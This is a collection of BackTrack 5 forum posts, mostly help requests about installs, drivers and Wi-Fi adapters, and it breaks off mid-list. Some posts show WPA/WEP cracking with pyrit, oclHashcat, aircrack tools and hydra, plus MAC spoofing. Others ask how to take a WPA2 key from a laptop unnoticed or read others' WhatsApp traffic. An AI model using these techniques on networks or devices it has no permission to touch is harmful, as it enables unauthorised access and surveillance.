Window Manager:
Architecture:
Image Type:
Download Type:
My hard drive has 240 GB Free...
On the partition where Windows XP is stored, has 20 GB. (will remove to install BackTrack)
Also, is VMware alright, or do I need to download another type Virtual desktop? Will do if necessary.
If you have the time, could you please explain this to me? Ive read some of the forums but some of it is a little hazy.. Id really appreciate it if some one could help me with this..
Windows 7 Home Premium
Sevice Pack 1
System:
Toshiba
Model: Satellite c655D
Processor: AMD E-300 APU with Radeon(tm) HD Graphics 1.30GHz
RAM: 4.00 GB (3.60 GB Usable)
System Type: 64-bit Operating System
Need more info, just email or post.... thanks.
P.S. Hard drive has 284 GB total with 240 GB Free... Space not issue. ;)
-
Hey folks,
i am new in the backtrack world so i wanted to try out pyrit. I imported 11 million passwords from wordlists and ran the batch command for my essid. after it finished, i tried to crack my .cap handshake but it failed. so i created a new textfile containing 3 passwords, one is the right psk. i imported the pws and ran the batch command again, assuming it would just take a second because it continues and only processes the three new passwords, but now it is stuck at 99,8%, only the pmk/s number changes, it seems like he is processing all passwords again.
Do i misunderstand pyrits continue-feature or is it a bug?
Regards
pyrit.jpg
Immagini allegate
-
Hi
i'm try to use the oclHashcat-plus v0.09 but when i run:
Code:
root@bt:/pentest/passwords/oclhashcat+# ./oclHashcat-plus32.bin -m2500 -a3 wpa.hccap ?l?l?l?l?l?l?l?l
oclHashcat-plus v0.07 by atom starting...
Hashes: 1
Unique salts: 1
Unique digests: 1
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
GPU-Loops: 64
GPU-Accel: 16
Password lengths range: 8 - 15
Platform: AMD compatible platform found
Platform: AMD compatible platform found
ERROR: ERROR: clGetDeviceIDs() -1
Code:
root@bt:/pentest/passwords/oclhashcat+# ./cudaHashcat-plus32.bin -m2500 -a3 loli.hccap ?l?l?l?l?l?l?l?l
./cudaHashcat-plus32.bin: error while loading shared libraries: libcuda.so.1: cannot open shared object file: No such file or directory
i'm running backtrack5 r3 and ati radeon hd3650 graphics
i tried several tutorials but i can't fix the problem
thanks
-
-
I am using BackTrack 5 R3 Virtual Machine in VirtualBox.
Recently, when I was updating BackTrack (by using the command
"apt-get update && apt-get upgrade && apt-get dist-upgrade"), I had to forcibly power off the VM. The updates were being installed at that time.
Now, when I try to update, I am getting the following error.
Code:
root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade
Hit http://all.repository.backtrack-linux.org revolution Release.gpg
Hit http://32.repository.backtrack-linux.org revolution Release.gpg
Hit http://updates.repository.backtrack-linux.org revolution Release.gpg
Ign http://all.repository.backtrack-linux.org/ revolution/main Translation-en_US
Ign http://32.repository.backtrack-linux.org/ revolution/main Translation-en_US
Ign http://updates.repository.backtrack-linux.org/ revolution/main Translation-en_US
Ign http://all.repository.backtrack-linux.org/ revolution/microverse Translation-en_US
Ign http://32.repository.backtrack-linux.org/ revolution/microverse Translation-en_US
Ign http://updates.repository.backtrack-linux.org/ revolution/microverse Translation-en_US
Ign http://all.repository.backtrack-linux.org/ revolution/non-free Translation-en_US
Ign http://32.repository.backtrack-linux.org/ revolution/non-free Translation-en_US
Ign http://updates.repository.backtrack-linux.org/ revolution/non-free Translation-en_US
Ign http://all.repository.backtrack-linux.org/ revolution/testing Translation-en_US
Ign http://32.repository.backtrack-linux.org/ revolution/testing Translation-en_US
Ign http://updates.repository.backtrack-linux.org/ revolution/testing Translation-en_US
Hit http://all.repository.backtrack-linux.org revolution Release
Hit http://32.repository.backtrack-linux.org revolution Release
Hit http://updates.repository.backtrack-linux.org revolution Release
Hit http://all.repository.backtrack-linux.org revolution/main Packages
Hit http://32.repository.backtrack-linux.org revolution/main Packages
Hit http://updates.repository.backtrack-linux.org revolution/main Packages
Hit http://all.repository.backtrack-linux.org revolution/microverse Packages
Hit http://32.repository.backtrack-linux.org revolution/microverse Packages
Hit http://updates.repository.backtrack-linux.org revolution/microverse Packages
Hit http://all.repository.backtrack-linux.org revolution/non-free Packages
Hit http://32.repository.backtrack-linux.org revolution/non-free Packages
Hit http://updates.repository.backtrack-linux.org revolution/non-free Packages
Hit http://all.repository.backtrack-linux.org revolution/testing Packages
Hit http://32.repository.backtrack-linux.org revolution/testing Packages
Hit http://updates.repository.backtrack-linux.org revolution/testing Packages
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
1 not fully installed or removed.
After this operation, 0B of additional disk space will be used.
Do you want to continue [Y/n]? y
Setting up w3af (1.2-bt2) ...
tar: pybloomfiltermmap-0.2.0.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
/var/lib/dpkg/info/w3af.postinst: line 4: cd: pybloomfiltermmap-0.2.0: No such file or directory
python: can't open file 'setup.py': [Errno 2] No such file or directory
svn: Working copy 'w3af' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
dpkg: error processing w3af (--configure):
subprocess installed post-installation script returned error exit status 1
Errors were encountered while processing:
w3af
E: Sub-process /usr/bin/dpkg returned an error code (1)
Somebody please help..
I dont want to loose the latest updates..
Thank You..
-
Ubuntu has been officially ported to the Nexus 7 with most of the hardware working. I have tried to run aircrack and reaver on it and it appears as though I'm able to get into monitor mode, but nothing appears when i run airodump-ng mon0 or wash -i mon0.
Is there a way I can patch the driver (bcmsdh sdmmc) to allow injections and such? If not is there any chances of an official backtrack 5 installer for the Nexus 7? :)
-
Hi
Every now and again the plasma workspace ramdomly crashes and then recovers itself here is the debug after i installed gdb
BTr3-KDE-64bit
-
Running BT5R3 amd64. Ran update/upgrade...wicd wouldn't work so I looked and looked and looked, but the solutions didn't seem to work in my case. I reinstalled and ran into more wicd issues such as it disappearing entirely. So, here is what worked for me. I hope maybe it will help someone down the road.
I had to install several packages. This was a challenge since I was trying to connect via usb tether as it was my only choice at the time and location. What I did was download the packages from Windows 7 since that is my primary OS. I then rebooted in BT and moved the files over. I think this took about 10 reboots in the end, but I got there. Here are the packages and order I installed them:
python-wicd_1.7.0+ds1-6_all.deb
dhcpcd-dbus_0.5.2-2_amd64.deb #this ended up not being needed
dhcpcd5_5.2.12-1_amd64.deb #this might not be needed. I have not removed it, but after installing it I still had no working wicd.
dhcpcd_3.2.3-9ubuntu0.1_amd64.deb #i think this was what I really needed as opposed to the previous 2 ^^^
wicd-kde_0.2.1-5_amd64.deb #after this and reboot I now had working wicd and also an icon in the systray which was not my goal, but a nice bonus
After this I went into wicd and connected via usb0. I got an IP address, but my internet connection still wouldn't work. After glancing at more topics I did 2 things:
in /etc/network/interfaces I added "auto usb0 iface usb0 inet dhcp" #I don't think I needed this
in /etc/resolv.conf I added a line "nameserver 192.168.x.x" #the IP I used was the gateway listed after running the "route" command.
#after this I tried again and had a successful connection.
I hope someone out there finds this helpful! :)
-
Hi all, hope you doing good
most programs uses ssl tls crypting, nowadays whatsapp phone application is one of the most used programs, it was readable in wireshark but now it uses ssl encryption, so any idea on how showing the messages comes in and out
LAN: phone, attacker-bt
all in the same lan
any idea how to show the messages fully un encrypted ??
and another question ,, is there is any tool for listening on viper calls or any call ?
-
-
Hey guys, in some other thread i had problem with cracking wep, and anything i did nothing worked, any trick, anything,.. after almost giving up i found out that the problem is in the hardware, in the wireless usb adapter SignalKing chipset RALINK 3070. Otherwise the adapter is great, you can crack wpa/wpa2, injection works, connecting works, evrything works like a charm, only when you want to crack wep and you want to Associate with the AP, you cannot in ANY WAY, tried all the tricks to do it. Then i made a test, with another wireless card, and with the same settings, and the same distance, on the same router, with the same wep settings and evrything the same, worked like the charm, but at the SignalKing chipset RALINK 3070 didnt work at any settings. I tried it even on another PC, and it didnt work.
Does anybody have any idea, i was looking on the forum, google it, and nobody seems to have the same problem. Is it the only solution to buy a new powerful wireless adapter or is there any solution?
-
Hey guys, in some other thread i had problem with cracking wep, and anything i did nothing worked, any trick, anything,.. after almost giving up i found out that the problem is in the hardware, in the wireless usb adapter SignalKing chipset RALINK 3070. Otherwise the adapter is great, you can crack wpa/wpa2, injection works, connecting works, evrything works like a charm, only when you want to crack wep and you want to Associate with the AP, you cannot in ANY WAY, tried all the tricks to do it. Then i made a test, with another wireless card, and with the same settings, and the same distance, on the same router, with the same wep settings and evrything the same, worked like the charm, but at the SignalKing chipset RALINK 3070 didnt work at any settings. I tried it even on another PC, and it didnt work.
Does anybody have any idea, i was looking on the forum, google it, and nobody seems to have the same problem. Is it the only solution to buy a new powerful wireless adapter or is there any solution?
-
Hey Gents,
Quick question see if anyone is getting the same errors I am. I am running bt5 R3 full HDD install KDE to be exact.
And knowing tor doesnt come installed by default I tried installing it manually. Following instructions from youtube Several video and goggling the content also came up with the same search results and the vast majority of all the sites and videos resort to these instructions as follows ...
Add the tor repository into your repository list(in this tutorial, I use Backtrack 5 R3 Debian base.) Edit file /etc/apt/sources.list and put below string into it.
- deb
http://deb.torproject.org/torproject.org lucid main
2. Add the new key for repository and update the software list
- gpg --keyserver keys.gnupg.net --recv 886DDD89
- gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
- apt-get update
3. Install Tor and Privoxy
- apt-get install tor privoxy tor-geoipdb vidalia
4. Edit config in privoxy config to
- forward-socks4a / 127.0.0.1:9050 .
5. Start the privoxy.
- /etc/init.d/privoxy start
6. Config your web browser to use privoxy (localhost:8118)
7. Test it use Tor network with URL
https://check.torproject.org/
__________________________________________
Now i've done this several times also.
and when get i get to this point during completing the process i get this output error.
apt-get install tor privoxy tor-geoipdb vidalia <~
i get the following "root@bt:~# apt-get install tor privoxy tor-geoipdb vidalia
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package tor is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package tor has no installation candidate"
Can anyone help me. Seems weird i had no issues installing tor before in R2 at all using Tork the tor manager. But now tork has issues installing automatically and im having issues installing it manually. Any suggestions or feed back would be greatly appreciated. Thanks in advance all...
-
Bottom Line Up Front:
Many members of the community want to install BT5 to SD card (bootable). We all seem to have the same problem (drops to Busybox shell, INITRAMFS prompt)..."-r ALERT! /dev/disk/by-uuid/<UUID> does not exist" .... Substitute "MMCBLK0" instead of "SDA/SDB/SDC..." in the instructions.
- Downloaded BT5 .ISO from backtrack.org, validated MD5 hash (download good)
- Installed .ISO to USB successfully
- Booted to USB
- Followed instructions from INFOSECRAMBLINGS for BT5 (great tutorial!): http://www.infosecramblings.com/back...sk-encryption/
*Basically, the key was to substitute the SDx drives for MMCBLK0(P1-P5) to get it to install on an SD Card. I was able to properly encrypt (512) and get back into it with the luksOpen command.
Problem:
Upon reboot, I am able to see the GRUB menu, showing Ubuntu 3.x and it launches. The text on the screen stops on, "Waiting for encrypted source drive ...."
Then, it fails out and dumps to Busybox shell with error, "-r ALERT! /dev/disk/by-uuid/<UUID> does not exist"
When I "ls-al /dev/disk/by-uuid", I don't see a symlink for the SD (MMCBLK0 or MMCBLK0p5). I watched as a symlink appeared when I plugged in another USB (SDB), but not when I removed/replaced the SD card (MMCBLK0). I even tried to manually create a symlink in /dev/disk/by-uuid
"ln -s sourcefile myfile"
The manual symlink shows as created in /dev/disk/by-uuid until I reboot....
Thank you in advance for any assistance. I will email Kevin Riggins (author of the tutorial) an see if he has input.
-
As the title said, I have physical access to a laptop with Windows 7 installed on it.
I have to gain access to the network from there.
The network is encrypted with WPA2-PSK.
The laptop has the key I need on it; but I don't understand the way it's been encrypted by Windows. :confused:
Well, anyways, I COULD achieve Admin access and go simple *View all characters*
But I feel that would leave some traces on it I can't erase with my skill level.
Lil help here? :(
-
Hi, im currently using Backtrack 5 r3 32 bit. i have searched all over the internet trying to find a way to install adobe flash player but everything i have tried hasnt worked.
does anyone have a walk through?
i am new to backtrack and still trying to understand the codes ect. so apologies if i come across stupid!
-
Has anyone had any fun with windows 8 yet? we have been trying it out with custom exploits in our lab and its a bit of a tough cookie!!!
I heard that VUPEN have a 0day which they are selling to "government agency's" only.. Obviously not interested in improving security for everyone.. only profiting from what they find! :mad:
http://www.bit-tech.net/news/bits/20...in8-zero-day/1
We have only just started playing with it and the UI kind of sucks unless you have a touch screen, its kind of like the old Windows Media Center but its basic enough.
There are a few interesting bits like the built in AV and firewall but instead of looking at all the old OS platform flaws (xp, vista etc and tutorials on how to exploit them) we should be looking into ways of making the new OS's exploitable (+ more secure :p).
I would be interested in your thoughts as XP (out of the box) is old and if anyone is running it they need to be told that they are a dribbling idiot.. and if anyone is exploiting it then they need to catch up..
Windows 7 is quite secure out of the box with SP updates but there are plenty of exploits out there for it, but Windows 8 will be rolled out on a massive scale on pretty much every customer PC.
I think this could be a really interesting topic so please post any links you come across with info or news on exploits as it is fascinating to see the development of a new OS and the the bugs people come across.
...............................................
Sent from an NC10 and proud!!! :o
-
Sorry if iv posted this in the wrong section as im new here, im using the adapter a few feet away from my head im just concerned about radiating my eyeballs out. How can i tell if its safe to use it i currently have it sat on a tv areal and im connecting to my friends network, would it be better to try and put it in my loft or something, if so what do i need to buy to get it up there.
-
-
Hi everyone.
I'm trying to get this Alfa card working. Plenty of irony as I bought this one to hopefully have a more trouble free backtrack experience but alas it doesn't seem so at this stage :)
Anyway, I've gone through and (I believe) correctly installed the compat-wireless drivers. Ath9k is associated with the card etc, but unfortunately I just can't get it recognized in ifconfig. Any help as to where I could go from here is greatly appreciated.
Initial Dmesg, I've got no idea why it's failing
Code:
root@bt:~# dmesg | grep ath
[ 8.912805] usb 2-1.3: ath9k_htc: Firmware htc_9271.fw requested
[ 8.912817] usbcore: registered new interface driver ath9k_htc
[ 9.196323] usb 2-1.3: ath9k_htc: Transferred FW: htc_9271.fw, size: 51272
[ 10.192919] ath9k_htc 2-1.3:1.0: ath9k_htc: Target is unresponsive
[ 10.192931] ath9k_htc: Failed to initialize the device
[ 10.201992] usb 2-1.3: ath9k_htc: USB layer deinitialized
lsmod
Code:
root@bt:~# lsmod | grep ath9k
ath9k_htc 90944 0
mac80211 539998 1 ath9k_htc
ath9k_common 13604 1 ath9k_htc
ath9k_hw 389542 2 ath9k_htc,ath9k_common
ath 23032 3 ath9k_htc,ath9k_common,ath9k_hw
cfg80211 205053 3 ath9k_htc,mac80211,ath
compat 19385 5 ath9k_htc,mac80211,ath9k_common,ath9k_hw,cfg8021
lsusb
Code:
root@bt:~# lsusb
Bus 006 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 005 Device 003: ID 046d:c066 Logitech, Inc.
Bus 005 Device 002: ID 058f:9254 Alcor Micro Corp. Hub
Bus 005 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 003: ID 0cf3:9271 Atheros Communications, Inc. AR9271 802.11n
Bus 002 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
After a while I pull it out / replug it in, it seems to initialize correctly...
Code:
root@bt:~# dmesg | grep ath9k
[ 8.912805] usb 2-1.3: ath9k_htc: Firmware htc_9271.fw requested
[ 8.912817] usbcore: registered new interface driver ath9k_htc
[ 9.196323] usb 2-1.3: ath9k_htc: Transferred FW: htc_9271.fw, size: 51272
[ 10.192919] ath9k_htc 2-1.3:1.0: ath9k_htc: Target is unresponsive
[ 10.192931] ath9k_htc: Failed to initialize the device
[ 10.201992] usb 2-1.3: ath9k_htc: USB layer deinitialized
[ 241.702859] usb 2-1.3: ath9k_htc: Firmware htc_9271.fw requested
[ 241.986525] usb 2-1.3: ath9k_htc: Transferred FW: htc_9271.fw, size: 51272
[ 242.221482] ath9k_htc 2-1.3:1.0: ath9k_htc: HTC initialized with 33 credits
[ 242.408728] ath9k_htc 2-1.3:1.0: ath9k_htc: FW Version: 1.3
[ 242.414171] Registered led device: ath9k_htc-phy1
But it still doesn't register :(
Code:
root@bt:~# modprobe ath9k_htc
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 50:e5:49:c9:4e:bb
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:46 Base address:0xe000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:64 errors:0 dropped:0 overruns:0 frame:0
TX packets:64 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
Like I said, any help is really appreciated.
-
Hey guys,
I am a long time windows user and work as a support technician.
I have scoured the internet but cannot resolve this issue.
I have an old toshiba satellite m40x which ran ubuntu just fine (wifi worked).
I am a bit of a linux noob and I have recently decided to play around with backtrack.
I installed bt5r3 and booted it up ok but I cannot connect to any wireless networks.
root@bt:~# lspci | grep -i network
06:02.0 Network controller: Intel Corporation PRO/Wireless 2915ABG [Calexico2] Network Connection (rev 05)
I have tried extracting ipw2200 firmware to /lib/firmware and a couple other things with no luck.
I have now fresh installed bt5r3 and would be appreciative if someone could help me get the wifi working.
cheers,
k00k
-
I downloaded and verified BT5R3-GNOME-32.iso and loaded it to a usb with unetbootin.
It boots to the command prompt. When I type startx, the screen goes black, the Caps Lock and Scoll Lock indicators on my keyboard start flashing, and the computer is locked. I tried BT5R3-KDE-32.iso, BT5-KDE-64.iso, and BT5R3-KDE-64.iso, same result.
I am using a Dell Vostro 3400, which has Intel HD Graphics and an i3-350 processor.
Any suggestions?
-
Hi guys,
First post on these here forums so please be gentle.
I've recently been doing some wireless auditing on our companies network. At current, it comprises of ~200 client machines, with about 20 or so laptops/handheld devices. I've been taking a BackTrack install with Wireshark and an Alfa wireless USB adapter around to key points on site to see what I can pick up, and I've come across a dead strange phenomenon.. Using Wireshark, I've come across plenty of 'normal' traffic between clients and APs but there are a few that look like this:
Screenshot.jpg
The device is unknown to us and although it could be an employee laptop or something like that, it isn't openly associated with any access point. It's more or less on site and broadcasting every day within working hours. That said it is broadcasting a lot of "Data" - the only other time I have seen these packets on this network is when they are encrypted with WPA2 OR the 4-way handshake has not been captured. As this device is not associated, de-authenticating it with aireplay cannot be done (I've tried!) and although Wireshark does have our WPA2 key input into it, it can't get very far without the 4-way handshake. So finding what these packets contain is proving tricky..
Could anyone give me a pointer? I've never seen this before, and have no idea how to pursue it.. Thanks to anyone in advance!
Edit: For some reason the screenshot is quite small on the forums - I've uploaded a larger version.
http://i.imgur.com/bjL8M.png
Immagini allegate
-
Hello Backtrack users,
I often read through these forums and have learned a lot from you all, now there is something i cannot seem to find via these forums or google and worse i think its probably something quite simple.
I have been happily using and tweaking backtrack 5 for sometime now, i have learned many things about security and linux in general. Curious about upgrading, i eventually did a dist-upgrade. However i seem to have failed to do any of this first.
/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop
update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove
Now backtrack no longer boots. it hangs at
"starting web server apache2 [OK]"
so my question is, how can i do the above from outside the OS and disable the startup programs that seem to be preventing backtrack from loading. i have no recovery option in grub as i removed them to present a polished look (yeah i know, bad idea)
If this issue has been covered in a previous thread, then i apologise as i have missed it. Please point me in the right direction.
-
hello
i have recently bought the wifi card adapter awus036h and i am using bactrack 5 r3 gnome in vmaware workstation version 9.
i have searched the forum and google alot! to solve this problem but havent found anything useful and im going nuts!
the problem is that everything starts ok..but when i use the command airodump-ng -c.. -w .. --bssid ----- mon0
along with aireplay-ng -1 -a (bssid) mon0
and with aireplay-ng -2 -p 0841 -b (bssid) mon
after a few minutes it could be 1 minute or up to 10 minutes, the wifi card adapters light stops flashing and i recieve no more data with airodump-ng!!
i have windows 7 and the card works great on my pc... but on backtrack 5 the airodump stops working really quick..i tried upgrading vmware tools.
i tried to: rmmod rtl8187
rfkill block all
rfkill unblock all
modprobe rtl8187
rfkill unblock all
ifconfig wlan0 up
but it didnt help..and also the radio wanst turned off so i dont think this should help.
pls..im going insane..any help would greatly be appreciated.. =]
-
-
Hi everyone,
Just trying to learn a bit about HTTP authentication, using it on my router at home from which I know the password.
I have gone through a lot of reading, and spending my limited time on reading about http authentication and usage of Hydra but I am just stuck.
The problem is Hydra keeps saying all passwords from my created list are correct.
I use the typical command for HTTP-post:
hydra -l admin 192.168.8.1 http-post-form "/login.lp:user=^USER^&password=^PASS^:The username or password you've entered is incorrect. Please check and try again." -P /pentest/passwords/crunch/netvigatorrouterpass -vV -o hydraattack.txt -t 1
I attach the HTTP code at the end so you can be sure I used the right names for PASS & USER.
This command keeps saying all the passwords from the file are all correct. I narrowed it down to 2 possible problems:
a) some error with the "bad password" code, but this is so straightforward I doubt this can be the problem.
b) the authentification seems to be done through a cookie (there is a cookie activated in the webpage named xAuth_SESSION_ID) and there is a function being called in the HTTP that seems to use it. Could this be the reason? how to deal with this cookie/function to get things right?
I appreciate suggestions/solutions/further reading or any tutorials that might be around, I have looked for long time but can't find any.
Thanks,
Andrupow
LOGIN page HTTP code
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Home Gateway - Login</title>
<link rel="stylesheet" type="text/css" href="/styles.css">
</head>
<body height="100%" style="margin:0px;">
<noscript>
<h1>THOMSON - Home Gateway</h1>
<h4>To view the Web interface of your device, JavaScript must be supported and enabled on your browser! <br><br>Please enable scripting and refresh your browser.</h4>
</noscript>
<script type="text/javascript">
//<![CDATA[
function disable_fields(theForm)
{
var len = theForm.elements.length;
for (var i = 0; i < len; i++) {
// Don't disable "hidden" fields
if(theForm.elements[i].type.toLowerCase()!="hidden")
theForm.elements[i].disabled = 1;
}
}
function setLanguage(langCode)
{
document.langSelect.elements[0].value = langCode;
document.langSelect.submit();
disable_fields(document.langSelect);
}
function noenter()
{ return !(window.event && window.event.keyCode == 13); }
var hex_chr = "0123456789abcdef";
function rhex(num)
{
str = "";
for(j = 0; j <= 3; j++)
str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
hex_chr.charAt((num >> (j * 8)) & 0x0F);
return str;
}
/*
* Convert a string to a sequence of 16-word blocks, stored as an array.
* Append padding bits and the length, as described in the MD5 standard.
*/
function str2blks_MD5(str)
{
nblk = ((str.length + 8) >> 6) + 1;
blks = new Array(nblk * 16);
for(i = 0; i < nblk * 16; i++) blks[i] = 0;
for(i = 0; i < str.length; i++)
blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
blks[i >> 2] |= 0x80 << ((i % 4) * 8);
blks[nblk * 16 - 2] = str.length * 8;
return blks;
}
/*
* Add integers, wrapping at 2^32. This uses 16-bit operations internally
* to work around bugs in some JS interpreters.
*/
function add(x, y)
{
var lsw = (x & 0xFFFF) + (y & 0xFFFF);
var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
/*
* Bitwise rotate a 32-bit number to the left
*/
function rol(num, cnt)
{
return (num << cnt) | (num >>> (32 - cnt));
}
var realm = "Home Gateway";
var nonce = "3582308:809191:292abca9b586846f450b1c8ed1e6a4 64";
var qop = "auth";
var uri = "/login.lp";
function submitAuthentication()
{
var user = document.getElementById("user").value;
var pwd = document.getElementById("password").value;
document.getElementById("password").disabled = true;
var HA1 = MD5(user + ":" + realm + ":" + pwd);
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("hidepw").value = MD5(HA1 + ":" + nonce +
":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();
disable_fields(document.authform);
}
//]]>
</script>
<table cellspacing="0" cellpadding="0" border="0" style="margin-top:10px;" height="100%" width="960" align="center">
<tr>
<td colspan="2">
<table cellspacing="0" cellpadding="0" border="0" class="banner" width="100%">
<tr>
<td height="60" width="400" style="background:url(/images/bar_no1_e.jpg) no-repeat top left;vertical-align:top"> </td>
<td class="Menu1" style="text-align:right">
<table height="60" cellspacing="0" cellpadding="0" border="0" align="right">
<tr><td style="vertical-align:top;text-align:right;padding-top:2px;">
<span class="displaySettings" id="displaySettings">
<span class="langSelect" id="langSelect">
<form name="langSelect" action="" method="post"><input type="hidden" name="6" value="en">
<input type="hidden" name="rn" value="-631237841">
Language: <strong>English</strong> <a href="" onClick="setLanguage('zh');return false;" title="中文">中文</a>
<div class='contentcontainer'>
<hr>
<div class='contentitem'>
<table cellspacing='0' cellpadding='0'>
<tr><td class='icon' valign='top' width='100px'><img src='/images/user__xl.gif' alt='Login !'></td>
<td class='data' valign='top'><table cellspacing='0' cellpadding='0'><tr><td align='left'><span class='itemtitle'>Login</span></td><td align='right'></td></tr>
<tr><td colspan='2'>
<p>Enter your username and password to access your Home Gateway.</p>
<p style="color:red">The username or password you've entered is incorrect. Please check and try again.</p>
<form method="post" action="login.lp" name="authform" id="authform">
<input type="hidden" name="rn" value="-1961196096">
<input type="hidden" name="hidepw" id="hidepw" value=""/>
<table width='100%' cellspacing='0' cellpadding='0'>
<tr><td width="40" valign="top"></td>
<td valign="top">
<table width='100%' class="datatable" cellspacing='0' cellpadding='0'>
<tr><td></td><td width='30px'></td><td width='220px'></td><td width='50px'></td></tr>
<tr><td colspan='4' height='7'><img src='/images/spacer.gif' alt='' border='0' height='7' width='1'></td></tr>
<tr>
<td width='120px'>Username:</td>
<td colspan='3'><input type="text" name="user" id="user" style="width: 250px;" onkeypress="return noenter()" maxlength="63" /></td>
</tr>
<tr><td colspan='4' height='7'><img src='/images/spacer.gif' alt='' border='0' height='7' width='1'></td></tr>
<tr>
<td width='120px'>Password:</td>
<td colspan='3'><input type="password" name="password" id="password" maxlength="63" style="width: 250px;" onkeypress="return noenter()" /></td></td>
</tr>
<tr><td colspan='4' height='7'><img src='/images/spacer.gif' alt='' border='0' height='7' width='1'></td></tr>
<tr>
<td colspan="4" align="right">
<input name="ok" type="button" value="OK" onclick='submitAuthentication()' />
<input name="cancel" type="button" value="Cancel" onclick='location.href="/";' />
</td>
</tr>
</table>
</td></tr>
</table>
</form>
</td></tr></table>
</td></tr></table>
</div>
<script type="text/javascript">
//<![CDATA[
document.authform.user.focus();
//]]>
-
Alright here I am with a big problem. My laptop screen is broken and I need to do my work on my laptop. There's only a little that I can. See but its blurry and moves so it doesn't help. Backtrack doen' work like ubuntu whereyou can just plug up a monitor. I really need to do my work but can't see so I'm wondering if someone can blindlygive me some steps on how to veiw my laptop on the screen. Thank,s in advance! (If its possible)
-
Hey guys,
first of all, thank u for helping me. Im new in Backtrack 5 3r and i already cracked my own Wlan. But i asked me, if i crack the Wlan, maybe i could read my Macadress and see who's the attacker. So i wanted to change that Wlan0 Mac Adress. I succeed but when i change the mac to 00:11:22:33:44:55 after a while (1-2 mins) the mac adress is changing by it self to a different or the old REAL mac.
Why is this happening? Could some1 help me? i dont understand that.
my steps when i change the mac adress are:
ifconfig eth0 down
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig eth0 up
ifconfig wlan0 up
i have to disable eth0 too, because if i doesnt, it wont change and i get the fault "Error: cant change mac: inferace up or no permission: device or resource busy"
i use Backtrack as a live CD on my USB Stick. (could that be the reason? because its just temp? but for the session it should work, doesnt it?)
again than u for help
greetings traderchange
-
I recently did an update, I'm running backtrack 5 r3, the update is listed below after I did this update Desktop Effects were broken could someone please point out what part of the update broke desktop effects.
Note that I can still run Xrender compositing but not OpenGL compositing as KDE gives the excuse that it was disabled by another application and reverts back to Xrender each time I select OpenGL.
I would be ok with this except for Xrender is slower that OpenGL. Listed below are the files that were updated.
Installed: icedtea-netx
Updated: dpkg, mysql-common, mysql-server, libc-bin, libc6, libc-bin, libc6-i686, libc-dev-bin, libc6-dev, tzdata-java, tzdata, libmysqlclient16, mysql-client-core-5.1, mysql-client-5.1, lsb-base, mysql-server-core-5.1, mysql-common, mysql-server-5.1, apt, libc-bin, python2.6-dev, libpython2.6, python2.6, python2.6-minimal, apt-utils, cron, dhcp3-client, dhcp3-common, gpgv, gnupg, vim-tiny, vim, vim-runtime, vim-common, procps, libkrb5-dev, krb5-multidev, libk5crypto3, libgssapi-krb5-2, libkrb5-3, libkrb5support0, libgssrpc4, libkdb5-4, libkadm5srv-mit7, libkadm5clnt-mit7, libxml2-dev, libxml2, bind9-host, dnsutils, libisc60, libdns64, libisccc60, libisccfg60, liblwres60, libbind9-60, libgc1c2, libgnutls-dev, libgnutls26, libgssglue1, apache2, apache2-mpm-prefork, apache2.2-common, apache2.2-bin, apache2-utils, apt-transport-https, libdbus-1-3, libexpat1-dev, libexpat1, dbus, dbus-x11, dpkg-dev, expat, libglib2.0-0, libnss3-1d, flashplugin-installer, libtiff4-dev, libtiffxx0c2, libtiff4, ghostscript, libgs8, gnupg-curl, libmagickcore2, libmagickwand2, imagemagick, initramfs-tools, initramfs-tools-bin, ruby1.8-dev, libruby1.8, ruby1.8, libreadline-ruby1.8, irb1.8, lsb-release, landscape-common, php5-cli, php5-sqlite, php5-mysql, libpq5, php5-pgsql, libapache2-mod-php5, php5-common, libexif12, libgl1-mesa-dev, mesa-common-dev, libgl1-mesa-dri, libgl1-mesa-glx, libglu1-mesa-dev, libglu1-mesa, libmagickcore2-extra, libopenssl-ruby1.8, libproxy0, libssh-4, libxml2-utils, libxslt1-dev, libxslt1.1, icedtea-6-jre-cacao, openjdk-6-jre-headless, 